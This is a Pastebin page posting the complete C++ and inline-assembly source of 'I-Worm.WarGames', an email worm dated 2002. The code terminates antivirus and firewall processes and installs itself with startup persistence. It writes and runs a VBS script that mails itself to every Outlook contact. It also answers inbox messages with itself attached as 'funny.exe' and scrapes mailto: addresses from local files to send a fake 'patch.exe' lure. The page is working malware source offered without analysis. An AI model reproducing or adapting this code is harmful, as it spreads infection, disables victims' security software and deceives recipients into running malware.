Advertisement
FlyFar

I-Worm.WarGames - Source Code

Jul 13th, 2023
691
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 10.79 KB | Cybersecurity | 0 0
  1. /*
  2. Name : I-Worm.WarGames
  3. Author : PetiK
  4. Date : February 12th 2002 - February 22th 2002
  5. Language : C++/Win32asm
  6. */
  7.  
  8. #include <stdio.h>
  9. #include <windows.h>
  10. #include <mapi.h>
  11. #include <tlhelp32.h>
  12. #pragma argused
  13. #pragma inline
  14.  
  15. char    filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
  16. int num,counter=0;
  17. char    *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
  18.          "n","o","p","q","r","s","t","u","v","w","x","y","z"};
  19. char    dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
  20. LPSTR   SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
  21. BYTE    desktop[50],favoris[50],personal[50],cache[50],page[150];
  22. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
  23.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
  24. DWORD   type=REG_SZ;
  25. FILE    *vbsworm,*winstart;
  26. HANDLE  lSnapshot,myproc;
  27. BOOL    rProcessFound;
  28.  
  29. LHANDLE session;
  30. MapiMessage mess;
  31. MapiMessage *mes;
  32. MapiRecipDesc from;
  33. char messId[512],mname[50],maddr[30];
  34. HINSTANCE hMAPI;
  35.  
  36. WIN32_FIND_DATA     ffile;
  37. PROCESSENTRY32      uProcess;
  38. HKEY            hReg;
  39. SYSTEMTIME      wartime;
  40.  
  41. void StopAV(char *);
  42. void FindFile(char *,char *);
  43. void GetMail(char *,char *);
  44. void sendmail(char *);
  45.  
  46. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
  47. ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
  48. ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
  49. ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
  50. ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
  51. ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
  52.  
  53. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
  54. {
  55. // Kill Some AntiVirus
  56. StopAV("AVP32.EXE");        // AVP
  57. StopAV("AVPCC.EXE");        // AVP
  58. StopAV("AVPM.EXE");     // AVP
  59. StopAV("WFINDV32.EXE");     // Dr. Solomon
  60. StopAV("F-AGNT95.EXE");     // F-Secure
  61. StopAV("NAVAPW32.EXE");     // Norton Antivirus
  62. StopAV("NAVW32.EXE");       // Norton Antivirus
  63. StopAV("NMAIN.EXE");        // Norton Antivirus
  64. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
  65. StopAV("ZONEALARM.EXE");    // ZoneAlarm
  66.  
  67. // Kill Some Worm
  68. StopAV("KERN32.EXE");       // I-Worm.Badtrans
  69. StopAV("SETUP.EXE");        // I-Worm.Cholera
  70. StopAV("RUNDLLW32.EXE");    // I-Worm.Gift
  71. StopAV("GONER.SCR");        // I-Worm.Goner
  72. StopAV("LOAD.EXE");     // I-Worm.Nimda
  73. StopAV("INETD.EXE");        // I-Worm.Plage - BadTrans
  74. StopAV("FILES32.VXD");      // I-Worm.PrettyPark
  75. StopAV("SCAM32.EXE");       // I-Worm.Sircam
  76. StopAV("GDI32.EXE");        // I-Worm.Sonic
  77. StopAV("_SETUP.EXE");       // I-Worm.ZippedFiles
  78. StopAV("EXPLORE.EXE");      // I-Worm.ZippedFiles
  79. StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
  80.  
  81. GetModuleFileName(hInst,filename,100);
  82. GetSystemDirectory((char *)sysdir,100);
  83. SetCurrentDirectory(sysdir);
  84. CopyFile(filename,"article.doc.exe",TRUE);
  85. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
  86. RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
  87. RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
  88. RegCloseKey(hReg);
  89.  
  90. randomize();
  91. num=rand() % 10;
  92. randname:
  93. strcat(copyr,alph[GetTickCount()%25]);
  94. if(++counter==num) {
  95.     strcat(copyr,".exe");
  96.     MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
  97.     CopyFile(filename,copyr,FALSE);
  98.     WriteProfileString("WINDOWS","RUN",copyr);
  99.     WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
  100.     goto endrandname;
  101.     }
  102. Sleep(GetTickCount()%100);
  103. goto randname;
  104. endrandname:
  105.  
  106. hMAPI=LoadLibrary("MAPI32.DLL");
  107. (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
  108. RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
  109. RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
  110. RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
  111. RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
  112. RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
  113. RegCloseKey(hReg);
  114. GetWindowsDirectory((char *)winhtm,100);
  115.  
  116. _asm
  117. {
  118. call    @wininet
  119. db  "WININET.DLL",0
  120. @wininet:
  121. call    LoadLibrary
  122. test    eax,eax
  123. jz  end_asm
  124. mov ebp,eax
  125. call    @inetconnect
  126. db  "InternetGetConnectedState",0
  127. @inetconnect:
  128. push    ebp
  129. call    GetProcAddress
  130. test    eax,eax
  131. jz  end_wininet
  132. mov edi,eax
  133. verf:
  134. push    0
  135. push    Tmp
  136. call    edi
  137. dec eax
  138. jnz verf
  139.  
  140. end_wininet:
  141. push    ebp
  142. call    FreeLibrary
  143. end_asm:
  144. jmp end_all_asm
  145.  
  146. Tmp dd 0
  147.  
  148. end_all_asm:
  149. }
  150.  
  151. FindFile(desktop,"*.htm");
  152. FindFile(desktop,"*.doc");
  153. FindFile(favoris,"*.ht*");
  154. FindFile(personal,"*.ht*");
  155. FindFile(personal,"*.doc");
  156. FindFile(personal,"*.xls");
  157. FindFile(personal,"*.asp");
  158. FindFile(cache,".ht*");
  159. FindFile(cache,".php");
  160. FindFile(cache,".asp");
  161. FindFile(winhtm,".ht*");
  162. FindFile(winhtm,".doc");
  163.  
  164.  
  165. vbsworm=fopen("wargames.vbs","w");
  166. fprintf(vbsworm,"On Error Resume Next\n");
  167. fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
  168. fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
  169. fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
  170. fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
  171. fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
  172. fprintf(vbsworm,"For Each C In MA.AddressLists\n");
  173. fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
  174. fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
  175. fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
  176. fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
  177. fprintf(vbsworm,"EM.To=AD.Address\n");
  178. fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
  179. fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
  180. fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
  181. fprintf(vbsworm,"EM.Body=body\n");
  182. fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
  183. fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
  184. fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
  185. fprintf(vbsworm,"EM.Send\n");
  186. fprintf(vbsworm,"End If\n");
  187. fprintf(vbsworm,"Next\n");
  188. fprintf(vbsworm,"End If\n");
  189. fprintf(vbsworm,"Next\n");
  190. fclose(vbsworm);
  191. ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
  192. Sleep(5000);
  193. DeleteFile("wargames.vbs");
  194.  
  195. (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
  196. (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
  197. (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
  198. (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
  199. (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
  200. mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
  201. if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
  202.   do {
  203.      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
  204.     strcpy(mname,mes->lpOriginator->lpszName);
  205.     strcpy(maddr,mes->lpOriginator->lpszAddress);
  206.     mes->ulReserved=0;
  207.     mes->lpszSubject="Re: Fw:";
  208.     mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
  209.                 "I send you a nice program. Look at this.\n\n"
  210.                 "   See you soon.";
  211.     mes->lpszMessageType=NULL;
  212.     mes->lpszDateReceived=NULL;
  213.     mes->lpszConversationID=NULL;
  214.     mes->flFlags=MAPI_SENT;
  215.     mes->lpOriginator->ulReserved=0;
  216.     mes->lpOriginator->ulRecipClass=MAPI_ORIG;
  217.     mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
  218.     mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
  219.     mes->nRecipCount=1;
  220.     mes->lpRecips->ulReserved=0;
  221.     mes->lpRecips->ulRecipClass=MAPI_TO;
  222.     mes->lpRecips->lpszName=mname;
  223.     mes->lpRecips->lpszAddress=maddr;
  224.     mes->nFileCount=1;
  225.     mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  226.     memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
  227.     mes->lpFiles->ulReserved=0;
  228.     mes->lpFiles->flFlags=NULL;
  229.     mes->lpFiles->nPosition=-1;
  230.     mes->lpFiles->lpszPathName=filename;
  231.     mes->lpFiles->lpszFileName="funny.exe";
  232.     mes->lpFiles->lpFileType=NULL;
  233.     mSendMail(session, NULL, mes, NULL, NULL);
  234.     }
  235.   }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
  236. free(mes->lpFiles);
  237. mFreeBuffer(mes);
  238. mLogoff(session,0,0,0);
  239. FreeLibrary(hMAPI);
  240. }
  241.  
  242.  
  243. }
  244.  
  245. void FindFile(char *folder, char *ext)
  246. {
  247. register bool abc=TRUE;
  248. register HANDLE hFile;
  249. char mail[128];
  250. SetCurrentDirectory(folder);
  251. hFile=FindFirstFile(ext,&ffile);
  252. if(hFile!=INVALID_HANDLE_VALUE) {
  253.     while(abc) {
  254.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
  255.     GetMail(ffile.cFileName,mail);
  256.     if(strlen(mail)>0) {
  257.     sendmail(mail);
  258.     }
  259.     abc=FindNextFile(hFile,&ffile);
  260.     }
  261. }
  262.  
  263. }
  264.  
  265. void GetMail(char *namefile, char *mail)
  266. {
  267. HANDLE  hf,hf2;
  268. char    *mapped;
  269. DWORD   size,i,k;
  270. BOOL    test=FALSE,valid=FALSE;
  271. mail[0]=0;
  272.  
  273. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
  274. if(hf==INVALID_HANDLE_VALUE)
  275.     return;
  276. size=GetFileSize(hf,NULL);
  277. if(!size)
  278.     return;
  279. if(size<8)
  280.     return;
  281. size-=100;
  282.  
  283. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
  284. if(!hf2) {
  285.     CloseHandle(hf);
  286.     return;
  287.     }
  288.  
  289. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
  290. if(!mapped) {
  291.     CloseHandle(hf2);
  292.     CloseHandle(hf);
  293.     return;
  294.     }
  295.  
  296. i=0;
  297. while(i<size && !test) {
  298. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
  299.     test=TRUE;
  300.     i+=strlen("mailto:");
  301.     k=0;
  302.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
  303.         if(mapped[i]!=' ') {
  304.             mail[k]=mapped[i];
  305.             k++;
  306.             if(mapped[i]=='@')
  307.                 valid=TRUE;
  308.         }
  309.         i++;
  310.     }
  311.     mail[k]=0;
  312.     } else
  313.     i++;
  314. }
  315.  
  316. if(!valid)
  317.     mail[0]=0;
  318. UnmapViewOfFile(mapped);
  319. CloseHandle(hf2);
  320. CloseHandle(hf);
  321. return;
  322. }
  323.  
  324. void sendmail(char *tos)
  325. {
  326. memset(&mess,0,sizeof(MapiMessage));
  327. memset(&from,0,sizeof(MapiRecipDesc));
  328. wsprintf(subj,"Mail to %s.",tos);
  329.  
  330. from.lpszName=NULL;
  331. from.ulRecipClass=MAPI_ORIG;
  332. mess.lpszSubject=subj;
  333. mess.lpszNoteText="I send you this patch.\n"
  334.         "It corrects a bug into Internet Explorer and Outlook.\n\n"
  335.         "   Have a nice day. Best Regards.";
  336.  
  337. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
  338.     if(!mess.lpRecips)
  339.     return;
  340. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
  341. mess.lpRecips->lpszName=tos;
  342. mess.lpRecips->lpszAddress=tos;
  343. mess.lpRecips->ulRecipClass=MAPI_TO;
  344. mess.nRecipCount=1;
  345.  
  346. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
  347.     if(!mess.lpFiles)
  348.     return;
  349. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
  350. mess.lpFiles->lpszPathName=filename;
  351. mess.lpFiles->lpszFileName="patch.exe";
  352. mess.nFileCount=1;
  353.  
  354. mess.lpOriginator=&from;
  355.  
  356. mSendMail(0,0,&mess,0,0);
  357.  
  358. free(mess.lpRecips);
  359. free(mess.lpFiles);
  360. }
  361.  
  362. void StopAV(char *antivirus)
  363. {
  364. register BOOL term;
  365. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  366. uProcess.dwSize=sizeof(uProcess);
  367. rProcessFound=Process32First(lSnapshot,&uProcess);
  368. while(rProcessFound) {
  369.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
  370.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
  371.         if(myproc!=NULL) {
  372.             term=TerminateProcess(myproc,0);
  373.         }
  374.         CloseHandle(myproc);
  375.     }
  376.     rProcessFound=Process32Next(lSnapshot,&uProcess);
  377. }
  378. CloseHandle(lSnapshot);
  379. }
Tags: internet worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement